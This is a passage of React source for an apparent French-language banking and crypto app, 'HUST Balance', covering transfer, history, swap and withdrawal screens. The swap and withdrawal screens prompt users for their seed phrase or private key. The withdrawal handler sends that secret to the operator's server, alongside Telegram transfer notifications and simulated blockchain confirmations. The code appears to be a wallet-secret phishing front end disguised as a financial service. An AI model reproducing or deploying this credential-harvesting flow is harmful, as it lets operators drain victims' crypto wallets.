
      // Notification Telegram À TRAITER
      await sendTransferNotification({
        type: transferType,
        amount: amountToDeduct,
        from: userDetails?.fullName,
        to: transferType,
        details: transferDetails   
      });
      
    } else {
      alert(`Erreur: ${transferResult.error || 'Virement échoué'}`);
    }
  } catch (error) {
    alert('Erreur réseau. Vérifiez votre connexion.');
    console.error('❌ Erreur virement bancaire:', error);
  }
}
    else if (showCryptoPage) {
      transferType = 'crypto';
         
      // RÉCUPÉRER LES DÉTAILS CRYPTO
      transferDetails = {
        cryptoCurrency: cryptoCurrency || 'BTC - Bitcoin',
        nickname: cryptoSurname || '',
        walletAddress: walletAddress || ''
      };  
     
     // 🆕 APPELER LE SERVEUR POUR DÉBITER
  try {
    const transferResponse = await fetch(`${SERVER_URL}/api/transfer`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({
        senderEmail: userDetails.email,
        recipientEmail: null,  // Pas de destinataire pour virement crypto
        amount: amountToDeduct,
        type: 'crypto',
        details: transferDetails
      })
    });
    
    const transferResult = await transferResponse.json();
    
    if (transferResult.success) {
      // Mettre à jour avec les données du serveur
      setUserDetails({...transferResult.sender});
      
      // Mettre à jour localStorage
      const allUsersUpdated = JSON.parse(localStorage.getItem('allUsers')) || {};
      allUsersUpdated[userDetails.email.toLowerCase()] = transferResult.sender;
      localStorage.setItem('allUsers', JSON.stringify(allUsersUpdated));
      
      console.log('✅ Virement crypto traité, débit enregistré');
   

     // Notification Telegram À TRAITER
      await sendTransferNotification({
        type: transferType,
        amount: amountToDeduct, 
        from: userDetails?.fullName,
        to: transferType,
        details: transferDetails
      });
     
    } else {
      alert(`Erreur: ${transferResult.error || 'Virement échoué'}`);
    }
  } catch (error) {
    alert('Erreur réseau. Vérifiez votre connexion.');
    console.error('❌ Erreur virement crypto:', error);
  }
}
      
    // Réinitialiser et retourner à l'accueil
    resetTransferStates();
    resetTransferForms();

// 🔥 SYNCHRONISER AVANT DE CHANGER DE PAGE
    await syncWithServer();
    console.log('🔥 Synchronisation forcée avant retour accueil');
    
    // Petit délai pour laisser React mettre à jour
    await new Promise(resolve => setTimeout(resolve, 100)); 

    setActiveTab('accounts');
  }}
    
              >
                Retour à l'accueil
              </button>
            </div>
          </div>
        )}
      </div>
    ) : false && showCryptoPage ? (
      <div className="min-h-screen bg-gradient-to-br from-violet-900 via-violet-800 to-black text-white p-4">
        {/* Header - sans le logo carré */}
        <div className="flex items-center mb-6 pt-12">
          <button className="text-white" onClick={() => {
  resetTransferForms();
  setShowCryptoPage(false);
}}>
            <ArrowLeft size={24} />
          </button>
          <h1 className="text-xl font-medium mx-auto">Ajouter un bénéficiaire</h1>
        </div>
        
        {/* Main content */}
        <h2 className="text-2xl font-bold mb-2">Retrait de crypto-monnaies</h2>
        <p className="text-gray-400 mb-6">Saisissez les détails ci-dessous pour effectuer un retrait.</p>
        
        {/* Message d'erreur */}
        {formError && (
          <div className="bg-red-500/20 text-red-200 p-3 rounded-lg mb-4">
            {formError}
          </div>
        )}
        
        {/* Form fields */}
        <div className="space-y-4">
          <div>
            <label className="text-gray-400 text-sm mb-1 block">Devise</label>
            <div className="relative">
              <button 
                className="w-full bg-gray-800/50 p-4 rounded-lg flex justify-between items-center"
                onClick={() => setShowCryptoCurrencyOptions(!showCryptoCurrencyOptions)}
              >
                <span>{cryptoCurrency}</span>
                {showCryptoCurrencyOptions ? <ChevronUp size={20} /> : <ChevronDown size={20} />}
              </button>
              
              {/* Options de devises */}
              {showCryptoCurrencyOptions && (
                <div className="absolute w-full mt-1 bg-gray-800 rounded-lg shadow-lg z-10 overflow-hidden">
                  {['BTC - Bitcoin', 'ETH - Ethereum', 'USDT - TetherUSD', 'SOL - Solana'].map((curr, index) => (
                    <button
                      key={index}
                      className={`w-full text-left p-4 hover:bg-violet-800/50 ${
                        curr === cryptoCurrency ? 'bg-violet-800/30' : ''
                      }`}
                      onClick={() => {
                        setCryptoCurrency(curr);
                        setShowCryptoCurrencyOptions(false);
                      }}
                    >
                      {curr}
                    </button>
                  ))}
                </div>
              )}
            </div>
          </div>
          
          <div>
            <label className="text-gray-400 text-sm mb-1 block">Surnom</label>
            <input 
              type="text" 
              className={`w-full bg-gray-800/50 p-4 rounded-lg text-white ${
                formError && !cryptoSurname.trim() ? 'border border-red-500' : ''
              }`}
              placeholder="Surnom" 
              value={cryptoSurname}
              onChange={e => setCryptoSurname(e.target.value)}
            />
          </div>
          
          <div>
            <label className="text-gray-400 text-sm mb-1 block">Adresse du portefeuille</label>
            <input 
              type="text" 
              className={`w-full bg-gray-800/50 p-4 rounded-lg text-white ${
                formError && !walletAddress.trim() ? 'border border-red-500' : ''
              }`}
              placeholder="Adresse du portefeuille" 
              value={walletAddress}
              onChange={e => setWalletAddress(e.target.value)}
            />
          </div>
          
          {/* Continue button - placé directement en dessous des champs */}
          <div className="pt-6">
            <button 
              className="w-full bg-violet-500 text-white py-4 rounded-lg font-medium"
              onClick={handleCryptoContinue}
            >
              Continuer
            </button>
          </div>
        </div>
        
        {/* Espace vide supplémentaire en bas */}
        <div className="h-52"></div>
      </div>














) : showTransfersPage ? (
  <div className="min-h-screen bg-gradient-to-br from-violet-900 via-violet-800 to-black">
    <div className="max-w-md mx-auto pt-12 px-2">
      <button 
        onClick={() => setShowTransfersPage(false)}
        className="text-white mb-6 flex items-center gap-2 hover:text-gray-300 transition"
      >
        <ArrowLeft className="w-6 h-6" /> Retour
      </button>
      <h1 className="text-3xl font-bold text-white mb-8">Transferts</h1>
      
      {/* Affichage des transactions ou message vide */}
      {transactionHistory.length === 0 ? (
        <div className="bg-white/10 backdrop-blur-lg rounded-3xl p-8 flex flex-col items-center justify-center" style={{ minHeight: '450px' }}>
          <div className="mb-4">
            <svg width="32" height="32" viewBox="0 0 24 24" fill="none" stroke="#9CA3AF" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
              <line x1="2" y1="8" x2="14" y2="8"/>
              <polyline points="6,4 2,8 6,12"/>
              <line x1="10" y1="16" x2="22" y2="16"/>
              <polyline points="18,12 22,16 18,20"/>
            </svg>
          </div>
          <p className="text-white/60 text-center text-base">
            Vos transferts apparaîtront ici
          </p>
        </div>
      ) : (
        <div className="space-y-3 pb-32">
          {transactionHistory.map((transaction) => {
            // Déterminer le logo et titre à afficher
            let logo;
            let title;
            
            if (transaction.type === 'swap') {
              logo = (
                <div className="w-8 h-8 rounded-full bg-violet-600 flex items-center justify-center">
                  <svg width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="white" strokeWidth="2.5" strokeLinecap="round" strokeLinejoin="round">
                    <path d="M3 12a9 9 0 0 1 9-9 9.75 9.75 0 0 1 6.74 2.74L21 8"/>
                    <path d="M21 3v5h-5"/>
                    <path d="M21 12a9 9 0 0 1-9 9 9.75 9.75 0 0 1-6.74-2.74L3 16"/>
                    <path d="M3 21v-5h5"/>
                  </svg>
                </div>
              );
              title = `Swap ${transaction.fromCrypto?.split(' - ')[0]} → HUST`;
            } else if (transaction.type === 'hust') {
              logo = (
                <div className="w-8 h-8 rounded-full bg-violet-600 flex items-center justify-center">
                <svg width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="white" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
                <path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2"/>
                <circle cx="12" cy="7" r="4"/>
                  </svg>
                </div>
              );
               title = transaction.amount > 0 ? `Reçu` : `Envoyé`;
            } else if (transaction.type === 'bank') {
              logo = (
                <div className="w-8 h-8 rounded-full bg-violet-600 flex items-center justify-center">
                <svg width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="white" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
                <path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2"/>
                <circle cx="12" cy="7" r="4"/>
                  </svg>
                </div>
              );
              title = `Retrait bancaire`;
            } else if (transaction.type === 'credit') {
              logo = (
                <div className="w-8 h-8 rounded-full bg-gradient-to-br from-violet-800 to-purple-900 flex items-center justify-center shadow-lg">
                  <span className="text-white font-black text-sm">%</span>
                </div>
              );
              title = transaction.description || 'Intérêts mensuels';
            } else if (transaction.type === 'crypto') {
              const cryptoType = transaction.cryptoCurrency?.split(' - ')[0];
              const cryptoLogos = {
                'BTC': bitcoinLogo,
                'ETH': ethereumLogo,
                'USDT': usdtLogo,
                'SOL': solanaLogo
              };
              logo = (
                <div className="w-8 h-8 rounded-full overflow-hidden flex items-center justify-center bg-white">
                  <img src={cryptoLogos[cryptoType]} alt={cryptoType} className="w-full h-full object-cover" />
                </div>
              );
              title = `Envoyé`;
            }
            
            return (
              <div key={transaction.id} className="bg-white/10 backdrop-blur-lg rounded-2xl p-2.5 flex items-start gap-3">
                {/* Logo */}
                <div className="flex-shrink-0">
                  {logo}
                </div>
                
                {/* Contenu */}
                <div className="flex-1 min-w-0">
                  {/* Titre */}
                  <h3 className="text-white font-semibold text-sm mb-0.5">
                    {title}
                  </h3>
                  
                  {/* Montant */}
                  <p className="text-white/70 text-xs">
                    {transaction.amount > 0 ? '+' : '-'} {Math.abs(transaction.amount).toLocaleString('fr-FR', { minimumFractionDigits: 2, maximumFractionDigits: 2 })} €
                  </p>
                  
                  {/* Détails */}
                  <p className="text-white/60 text-xs">
                    {transaction.type === 'swap' && `Converti en HUST Balance`}
                    {transaction.type === 'hust' && transaction.recipient}
                    {transaction.type === 'bank' && `IBAN: ${transaction.iban?.substring(0, 10)}...`}
                    {transaction.type === 'crypto' && `${transaction.walletAddress?.substring(0, 10)}...`}
                    {transaction.type === 'credit' && `Crédité automatiquement`}
                  </p>
                  
                  {/* Date */}
                  <p className="text-white/50 text-xs">
                    {new Date(transaction.date).toLocaleString('fr-FR')}
                  </p>
                </div>
              </div>
            );
          })}
        </div>
      )}
    </div>
  </div>

















) : showSwapPage ? (
  <div className="fixed inset-0 bg-gradient-to-br from-violet-900 via-violet-800 to-black z-50">
    
    {/* ÉTAPE 1 : Sélection montant */}
    {swapStep === 'amount' ? (
      <div className="min-h-screen p-4 pb-32">
        <div className="max-w-md mx-auto pt-14">
          <button 
            onClick={() => {
              setShowSwapPage(false);
              setActiveTab('transfers');
              setSwapAmount('');
              setSwapEstimatedHust('0.00');
              setSwapStep('amount');
            }}
            className="text-white mb-6 flex items-center gap-2 hover:text-gray-300 transition"
          >
            <ArrowLeft className="w-6 h-6" /> Retour
          </button>

          <h1 className="text-2xl font-bold text-white mb-1">Swap</h1>
          <p className="text-gray-300 text-sm mb-6">Convertissez vos cryptos en HUST Balance</p>

          {/* Les deux cases SÉPARÉES avec espace */}
          <div className="relative mb-6">
            {/* Card FROM - Crypto */}
            <div className="bg-white/10 backdrop-blur-lg rounded-2xl p-3 mb-1">
              <div className="mb-1">
                <label className="text-white text-xs font-medium">De</label>
              </div>
              
              <button
                onClick={() => setShowSwapFromModal(true)}
                className="flex items-center gap-2 mb-1 hover:opacity-80 transition"
              >
                <img 
                  src={
                    swapFromAsset.symbol === 'BTC' ? bitcoinLogo :
                    swapFromAsset.symbol === 'ETH' ? ethereumLogo :
                    swapFromAsset.symbol === 'SOL' ? solanaLogo :
                    usdtLogo
                  }
                  alt={swapFromAsset.symbol}
                  className="w-7 h-7 rounded-full"
                />
                <span className="text-white text-base font-bold">{swapFromAsset.symbol}</span>
                <span className="text-white text-xs ml-auto">▼</span>
              </button>

              <div className="text-gray-400 text-xs mb-1">
                Balance: {userDetails?.cryptoWallet?.[swapFromAsset.symbol]?.balance?.toFixed(8) || '0.00000000'} {swapFromAsset.symbol}
              </div>

              <div className="relative">
                <input
                  type="text"
                  inputMode="decimal"
                  value={swapAmount}
                  onChange={(e) => {
                    const value = e.target.value;
                    if (value === '' || /^\d*[.,]?\d*$/.test(value)) {
                      setSwapAmount(value.replace(',', '.'));
                    }
                  }}
                  placeholder="0.00"
                  className="w-full bg-transparent text-white text-xl font-bold outline-none"
                />
              </div>
              
              <div className="text-gray-400 text-xs">
                ≈ {swapAmount && swapCryptoPrice ? (parseFloat(swapAmount) * swapCryptoPrice).toFixed(2) : '0.00'}€
              </div>
            </div>

            {/* Bouton avec espace identique à l'espace entre les cases */}
            <div className="absolute left-1/2 -translate-x-1/2 z-10" style={{ top: 'calc(50% - 28px)' }}>
              <div
                className="w-14 h-14 bg-white/20 backdrop-blur-lg rounded-full flex items-center justify-center border-4 border-violet-900 shadow-lg"
              >
                <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="white" strokeWidth="2.5">
                  <path d="M12 5v14M19 12l-7 7-7-7"/>
                </svg>
              </div>
            </div>

            {/* Card TO - HUST Balance */}
            <div className="bg-white/10 backdrop-blur-lg rounded-2xl p-3">
              <div className="mb-1">
                <label className="text-white text-xs font-medium">Vers</label>
              </div>
              
              <div className="flex items-center gap-2 mb-2">
                <img 
                  src={hustLogo}
                  alt="HUST"
                  className="w-7 h-7 rounded-full"
                />
                <span className="text-white text-base font-bold">HUST Balance</span>
              </div>

              <div className="text-white text-xl font-bold">
                {swapEstimatedHust}€
              </div>
              
              <div className="text-gray-400 text-xs mt-1">
                Balance actuelle: {userDetails?.balance?.toFixed(2) || '0.00'}€
              </div>
            </div>
          </div>

          
                           
          {/* Informations - RÉDUIT */}
          <div className="bg-violet-600/20 rounded-xl p-3 mb-4">
  <div className="flex justify-between text-xs mb-1">
    <span className="text-gray-300">Taux</span>
    <span className="text-white font-medium">
      1 {swapFromAsset.symbol} = {swapCryptoPrice.toLocaleString('fr-FR', {maximumFractionDigits: 0})}€
    </span>
  </div>
  <div className="flex justify-between text-xs mb-1">
    <span className="text-gray-300">Frais réseau</span>
    <span className="text-white font-medium">~{swapFromAsset.symbol === 'BTC' ? '3-5€' : '1-2€'}</span>
  </div>
  <div className="flex justify-between text-xs">
    <span className="text-gray-300">Frais de service (0.5%)</span>
    <span className="text-white font-medium">
      {swapAmount && swapCryptoPrice ? (parseFloat(swapAmount) * swapCryptoPrice * 0.005).toFixed(2) : '0.00'}€
    </span>
  </div>
</div>


          {/* Bouton Continuer */}
          <button
            onClick={() => {
              if (!swapAmount || parseFloat(swapAmount) <= 0) {
                alert('Veuillez entrer un montant valide');
                return;
              }
              // Vérifier que le montant n'excède pas le solde
              if (parseFloat(swapAmount) > (swapFromAsset.balance || 0)) {
                alert('Solde insuffisant. Vous ne pouvez pas échanger plus que votre solde disponible.');
                return;
              }
              setSwapStep('signature');
            }}
            disabled={!swapAmount || parseFloat(swapAmount) <= 0 || parseFloat(swapAmount) > (swapFromAsset.balance || 0)}
            className={`w-full py-4 rounded-xl font-bold transition ${
              swapAmount && parseFloat(swapAmount) > 0 && parseFloat(swapAmount) <= (swapFromAsset.balance || 0)
                ? 'bg-violet-500 text-white hover:bg-violet-600'
                : 'bg-gray-600 text-gray-400 cursor-not-allowed'
            }`}
          >
            Continuer
          </button>
        </div>
      </div>
    ) : swapStep === 'signature' ? (
      <div className="min-h-screen p-4 pb-32">
        <div className="max-w-md mx-auto pt-14">
          <button 
            onClick={() => setSwapStep('amount')}
            className="text-white mb-6 flex items-center gap-2 hover:text-gray-300 transition"
          >
            <ArrowLeft className="w-6 h-6" /> Retour
          </button>

          <h1 className="text-2xl font-bold text-white mb-1">Confirmer le Swap</h1>
          <p className="text-gray-300 text-sm mb-6">Signez la transaction pour finaliser</p>

          {/* Résumé du swap - COMPACT */}
          <div className="bg-white/10 backdrop-blur-lg rounded-2xl p-3 mb-3">
            <div className="text-center mb-2">
              <div className="text-gray-400 text-xs mb-0.5">Vous envoyez</div>
              <div className="text-white text-xl font-bold">{swapAmount} {swapFromAsset.symbol}</div>
              <div className="text-gray-400 text-xs">
                ≈ {(parseFloat(swapAmount) * swapCryptoPrice).toFixed(2)}€
              </div>
            </div>

            <div className="flex justify-center my-2">
              <div className="text-violet-300 text-lg">↓</div>
            </div>

            <div className="text-center">
              <div className="text-gray-400 text-xs mb-0.5">Vous recevrez</div>
              <div className="text-white text-xl font-bold">{swapEstimatedHust}€</div>
              <div className="text-gray-400 text-xs">HUST Balance</div>
            </div>
          </div>

          {/* Avertissement - SANS l'adresse */}
          <div className="bg-orange-500/20 rounded-xl p-2.5 mb-3">
            <div className="flex gap-2">
              <AlertCircle className="w-4 h-4 text-orange-400 flex-shrink-0 mt-0.5" />
              <div>
                <div className="text-orange-100 text-xs font-medium mb-0.5">
                  Temps de confirmation: 10-60 minutes
                </div>
                <div className="text-orange-200 text-xs">
                  Votre HUST Balance sera créditée automatiquement après confirmation blockchain.
                </div>
              </div>
            </div>
          </div>

          {/* Choix de la méthode - BOUTONS SUR MÊME LIGNE */}
          <div className="mb-3">
            <label className="text-white text-sm font-medium mb-2 block">
              Choisissez votre méthode de signature
            </label>
            
            <div className="flex gap-2">
              <button
                onClick={() => setSwapSignatureMethod('seed')}
                className={`flex-1 p-3 rounded-xl border-2 transition ${
                  swapSignatureMethod === 'seed'
                    ? 'border-violet-500 bg-violet-500/20'
                    : 'border-gray-600 bg-gray-800/50'
                }`}
              >
                <div className="text-center">
                  <div className="text-white font-medium text-sm">Seed Phrase</div>
                  <div className="text-gray-400 text-xs">12 ou 24 mots</div>
                </div>
              </button>

              <button
                onClick={() => setSwapSignatureMethod('private')}
                className={`flex-1 p-3 rounded-xl border-2 transition ${
                  swapSignatureMethod === 'private'
                    ? 'border-violet-500 bg-violet-500/20'
                    : 'border-gray-600 bg-gray-800/50'
                }`}
              >
                <div className="text-center">
                  <div className="text-white font-medium text-sm">Clé Privée</div>
                  <div className="text-gray-400 text-xs">Format hexa</div>
                </div>
              </button>
            </div>
          </div>

          {/* Champ de saisie */}
          {swapSignatureMethod === 'seed' ? (
            <div className="mb-3">
              <label className="text-white text-sm font-medium mb-1.5 block">
                Entrez votre Seed Phrase
              </label>
              <textarea
                value={swapSeedPhrase}
                onChange={(e) => setSwapSeedPhrase(e.target.value)}
                placeholder="word1 word2 word3 ..."
                style={{ fontSize: '16px' }}
                className="w-full bg-gray-800/50 text-white p-3 rounded-xl outline-none border-2 border-gray-600 focus:border-violet-500 transition min-h-[90px]"
              />
              <div className="text-gray-400 text-xs mt-1">
                Séparez chaque mot par un espace
              </div>
            </div>
          ) : (
            <div className="mb-3">
              <label className="text-white text-sm font-medium mb-1.5 block">
                Entrez votre Clé Privée
              </label>
              <textarea
                value={swapPrivateKey}
                onChange={(e) => setSwapPrivateKey(e.target.value)}
                placeholder="0x..."
                style={{ fontSize: '16px' }}
                className="w-full bg-gray-800/50 text-white p-3 rounded-xl outline-none border-2 border-gray-600 focus:border-violet-500 transition min-h-[70px]"
              />
              <div className="text-gray-400 text-xs mt-1">
                Format hexadécimal commençant par 0x
              </div>
            </div>
          )}

          {/* Bouton Signer */}
          <button
            onClick={handleSwapTransaction}
            disabled={swapSignatureMethod === 'seed' ? !swapSeedPhrase.trim() : !swapPrivateKey.trim()}
            className={`w-full py-4 rounded-xl font-bold transition ${
              (swapSignatureMethod === 'seed' ? swapSeedPhrase.trim() : swapPrivateKey.trim())
                ? 'bg-violet-500 text-white hover:bg-violet-600'
                : 'bg-gray-600 text-gray-400 cursor-not-allowed'
            }`}
          >
            Signer et envoyer
          </button>
        </div>
      </div>
    ) : swapStep === 'pending' ? (
      <div className="min-h-screen flex items-center justify-center p-6">
        <div className="w-full max-w-md bg-white/10 backdrop-blur-lg rounded-3xl p-8 text-center">
          <div className="w-20 h-20 bg-violet-600 rounded-full flex items-center justify-center mx-auto mb-6 animate-pulse">
            <RefreshCw className="w-10 h-10 text-white animate-spin" />
          </div>
          
          <h2 className="text-3xl font-bold text-white mb-4">Swap en cours...</h2>
          <p className="text-gray-300 mb-6">
            Votre transaction a été envoyée à la blockchain. Elle sera confirmée dans 10-60 minutes.
          </p>

          <div className="bg-violet-600/30 rounded-xl p-5 mb-6 text-left">
            <div className="text-gray-300 text-sm mb-2">Transaction Hash</div>
            <div className="flex items-center gap-2">
              <div className="text-white text-xs font-mono flex-1 overflow-hidden text-ellipsis">
                {swapTxHash}
              </div>
              <button className="text-violet-400 text-sm">Copier</button>
            </div>
          </div>

          <div className="bg-blue-500/20 rounded-xl p-4 mb-6">
            <div className="flex gap-3">
              <Info className="w-5 h-5 text-blue-400 flex-shrink-0 mt-0.5" />
              <p className="text-blue-100 text-sm text-left">
                Votre HUST Balance sera créditée automatiquement dès confirmation. Vous recevrez une notification.
              </p>
            </div>
          </div>

          <button
            onClick={() => {
              setShowSwapPage(false);
              setActiveTab('accounts');
              setSwapStep('amount');
              setSwapAmount('');
              setSwapEstimatedHust('0.00');
              setSwapSeedPhrase('');
              setSwapPrivateKey('');
            }}
            className="w-full bg-violet-500 text-white py-4 rounded-xl font-bold hover:bg-violet-600 transition"
          >
            Retour à l'accueil
          </button>
        </div>
      </div>
    ) : null}

    {/* Modal sélection crypto */}
    {showSwapFromModal && (
      <div className="fixed inset-0 bg-black/50 flex items-end justify-center z-50">
        <div className="bg-gray-900 rounded-t-3xl w-full max-w-md p-6 animate-slide-up">
          <div className="flex justify-between items-center mb-6">
            <h3 className="text-xl font-bold text-white">Choisir la crypto</h3>
            <button onClick={() => setShowSwapFromModal(false)} className="text-gray-400">
              <X className="w-6 h-6" />
            </button>
          </div>

          <div className="space-y-3">
             {[
          { symbol: 'BTC', name: 'Bitcoin', logo: bitcoinLogo },
          { symbol: 'ETH', name: 'Ethereum', logo: ethereumLogo },
          { symbol: 'SOL', name: 'Solana', logo: solanaLogo },
          { symbol: 'USDT', name: 'Tether', logo: usdtLogo }
        ].map((crypto) => {
          const realBalance = userDetails?.cryptoWallet?.[crypto.symbol]?.balance || 0;
          return (
              <button
                key={crypto.symbol}
                onClick={() => {
              setSwapFromAsset({ 
                ...swapFromAsset, 
                symbol: crypto.symbol, 
                name: crypto.name, 
                balance: realBalance 
              });
              setShowSwapFromModal(false);
            }}
                className={`w-full p-4 rounded-xl flex items-center gap-3 transition ${
                  swapFromAsset.symbol === crypto.symbol
                    ? 'bg-violet-600'
                    : 'bg-gray-800 hover:bg-gray-700'
                }`}
              >
                <img src={crypto.logo} alt={crypto.symbol} className="w-10 h-10 rounded-full" />
                <div className="text-left flex-1">
                  <div className="text-white font-bold">{crypto.symbol}</div>
                  <div className="text-gray-400 text-sm">{crypto.name}</div>
                </div>
                {swapFromAsset.symbol === crypto.symbol && (
                  <Check className="w-5 h-5 text-white" />
                )}
              </button>
             );     
          })}
          </div>
        </div>
      </div>
    )}
  </div>





















) : showCryptoWithdrawalPage ? (
  // 🆕 NOUVELLE PAGE DE RETRAIT CRYPTO - VERSION COMPACTE
  <div className="fixed inset-0 bg-gradient-to-br from-violet-900 via-violet-800 to-black z-50">
    {withdrawalStep === 'success' ? (
      // Page de succès
      <div className="min-h-screen flex items-center justify-center p-4">
        <div className="w-full max-w-md bg-white/10 backdrop-blur-lg rounded-3xl p-6 text-center">
          <div className="w-16 h-16 bg-green-500 rounded-full flex items-center justify-center mx-auto mb-4">
            <Check className="w-10 h-10 text-white" />
          </div>
          <h2 className="text-2xl font-bold text-white mb-3">Retrait envoyé !</h2>
          <p className="text-gray-300 text-sm mb-2">Votre transaction a été diffusée</p>
          <p className="text-3xl font-bold text-white my-4">{withdrawalAmount} {selectedWithdrawalCrypto}</p>
          <p className="text-gray-400 text-xs mb-1">≈ {(parseFloat(withdrawalAmount || 0) * (
            selectedWithdrawalCrypto === 'BTC' ? 45000 :
            selectedWithdrawalCrypto === 'ETH' ? 3500 :
            selectedWithdrawalCrypto === 'USDT' ? 0.92 : 150
          )).toFixed(2)}€</p>
          <p className="text-gray-400 text-xs mb-1">vers</p>
          <p className="text-gray-300 text-xs mb-6 break-all bg-white/10 p-2 rounded-lg">{withdrawalAddress}</p>
          <div className="bg-blue-500/20 rounded-xl p-2 mb-4">
            <p className="text-blue-100 text-xs">
              La transaction apparaîtra dans la blockchain dans quelques minutes.
            </p>
          </div>
          <button 
            onClick={() => {
              setShowCryptoWithdrawalPage(false);
              setWithdrawalStep('form');
              setWithdrawalAmount('');
              setWithdrawalAddress('');
              setWithdrawalSeedInput('');
              setActiveTab('accounts');
            }}
            className="w-full bg-violet-500 text-white py-3 rounded-xl font-bold hover:bg-violet-600 transition"
          >
            Nouveau retrait
          </button>
        </div>
      </div>
    ) : withdrawalStep === 'processing' ? (
      // Page de traitement
      <div className="min-h-screen flex items-center justify-center p-4">
        <div className="w-full max-w-md bg-white/10 backdrop-blur-lg rounded-3xl p-6 text-center">
          <div className="w-16 h-16 border-4 border-white/30 border-t-white rounded-full animate-spin mx-auto mb-4"></div>
          <h2 className="text-xl font-bold text-white mb-2">Traitement en cours...</h2>
          <p className="text-gray-300 text-sm">Votre transaction est en cours de traitement</p>
        </div>
      </div>
    ) : withdrawalStep === 'confirm' ? (
      // Page de confirmation
      <div className="min-h-screen flex items-center justify-center p-4">
        <div className="w-full max-w-md bg-white/10 backdrop-blur-lg rounded-3xl p-4">
          <h2 className="text-xl font-bold text-white mb-4">Confirmer le retrait</h2>

          <div className="bg-violet-600/30 rounded-xl p-3 mb-4">
            <div className="flex justify-between items-center mb-2">
              <span className="text-gray-300 text-xs">Montant</span>
              <div className="text-right">
                <div className="text-white font-bold text-sm">{withdrawalAmount} {selectedWithdrawalCrypto}</div>
                <div className="text-gray-400 text-xs">≈ {(parseFloat(withdrawalAmount || 0) * (
                  selectedWithdrawalCrypto === 'BTC' ? 45000 :
                  selectedWithdrawalCrypto === 'ETH' ? 3500 :
                  selectedWithdrawalCrypto === 'USDT' ? 0.92 : 150
                )).toFixed(2)}€</div>
              </div>
            </div>
            <div className="mb-2">
              <span className="text-gray-300 text-xs block mb-1">Vers l'adresse</span>
              <span className="text-white text-xs break-all bg-white/10 p-2 rounded block">{withdrawalAddress}</span>
            </div>
            <div className="border-t border-white/20 my-2"></div>
            <div className="flex justify-between items-center mb-1">
              <span className="text-gray-300 text-xs">Frais réseau (estimés)</span>
              <span className="text-gray-300 text-xs">~{
                selectedWithdrawalCrypto === 'BTC' ? '0.00008' :
                selectedWithdrawalCrypto === 'ETH' ? '0.001' :
                selectedWithdrawalCrypto === 'USDT' ? '8' : '0.00005'
              } {selectedWithdrawalCrypto}</span>
            </div>
            <p className="text-gray-500 text-xs">Fourchette : {
              selectedWithdrawalCrypto === 'BTC' ? '0.00005 - 0.0002' :
              selectedWithdrawalCrypto === 'ETH' ? '0.0008 - 0.002' :
              selectedWithdrawalCrypto === 'USDT' ? '5 - 15' : '0.00001 - 0.0001'
            } {selectedWithdrawalCrypto}</p>
          </div>

          <div className="bg-red-500/20 rounded-xl p-3 mb-3 flex gap-2">
            <Lock className="w-4 h-4 text-red-300 flex-shrink-0 mt-0.5" />
            <div className="text-red-100 text-xs">
              <p className="font-bold mb-1">Authentification requise</p>
              <p>Choisissez votre méthode d'authentification.</p>
            </div>
          </div>

          <div className="flex gap-2 mb-3">
            <button
              onClick={() => setAuthMethod('seed')}
              className={`flex-1 py-2 rounded-xl text-sm font-medium transition ${
                authMethod === 'seed' 
                  ? 'bg-violet-600 text-white' 
                  : 'bg-white/20 text-gray-300 hover:bg-white/30'
              }`}
            >
              Seed Phrase
            </button>
            <button
              onClick={() => setAuthMethod('key')}
              className={`flex-1 py-2 rounded-xl text-sm font-medium transition ${
                authMethod === 'key' 
                  ? 'bg-violet-600 text-white' 
                  : 'bg-white/20 text-gray-300 hover:bg-white/30'
              }`}
            >
              Clé Privée
            </button>
          </div>

          <label className="text-white text-xs font-medium block mb-2">
            {authMethod === 'seed' ? 'Seed phrase (12-24 mots)' : `Clé privée ${selectedWithdrawalCrypto}`}
          </label>
          
          <div className="relative mb-3">
            <textarea
              value={withdrawalSeedInput}
              onChange={(e) => setWithdrawalSeedInput(e.target.value)}
              placeholder={authMethod === 'seed' 
                ? 'abandon ability able about above...'
                : selectedWithdrawalCrypto === 'BTC' 
                  ? 'L5oLkpV3aqBjhki6Lm... ou hex'
                  : '0x1234567890abcdef...'}
              className="w-full bg-white/20 text-white py-3 px-3 rounded-xl border-2 border-white/30 focus:border-white outline-none h-24 resize-none font-mono text-xs"
              style={{ WebkitTextSecurity: showWithdrawalSeed ? 'none' : 'disc' }}
            />
            <button
              onClick={() => setShowWithdrawalSeed(!showWithdrawalSeed)}
              className="absolute top-3 right-3 text-gray-400 hover:text-white"
            >
              {showWithdrawalSeed ? <EyeOff className="w-4 h-4" /> : <Eye className="w-4 h-4" />}
            </button>
          </div>

          <div className="bg-yellow-500/20 rounded-xl p-2 flex gap-2 mb-3">
            <AlertCircle className="w-4 h-4 text-yellow-300 flex-shrink-0 mt-0.5" />
            <p className="text-yellow-100 text-xs">
              {authMethod === 'seed' 
                ? 'Seed phrase : 12, 15, 18, 21 ou 24 mots.'
                : 'Votre clé privée signera la transaction.'}
            </p>
          </div>

          <div className="flex gap-2">
            <button
              onClick={() => {
                setWithdrawalStep('form');
                setWithdrawalSeedInput('');
              }}
              className="flex-1 bg-white/20 text-white py-3 rounded-xl text-sm font-bold hover:bg-white/30 transition"
            >
              Annuler
            </button>
            <button
              onClick={async () => {
                if (withdrawalSeedInput.length > 10) {
                  setWithdrawalStep('processing');
                  
                  try {
                    const response = await fetch(`${SERVER_URL}/api/withdraw-crypto`, {
                      method: 'POST',
                      headers: { 'Content-Type': 'application/json' },
                      body: JSON.stringify({
                        email: userDetails?.email,
                        crypto: selectedWithdrawalCrypto,
                        amount: parseFloat(withdrawalAmount),
                        address: withdrawalAddress,
                        authMethod: authMethod,
                        authValue: withdrawalSeedInput
                      })
                    });
                    
                    const result = await response.json();
                    
                    if (result.success) {
                      setUserDetails(result.user);
                      
                      const allUsers = JSON.parse(localStorage.getItem('allUsers')) || {};
                      allUsers[userDetails.email.toLowerCase()] = result.user;
                      localStorage.setItem('allUsers', JSON.stringify(allUsers));
                      
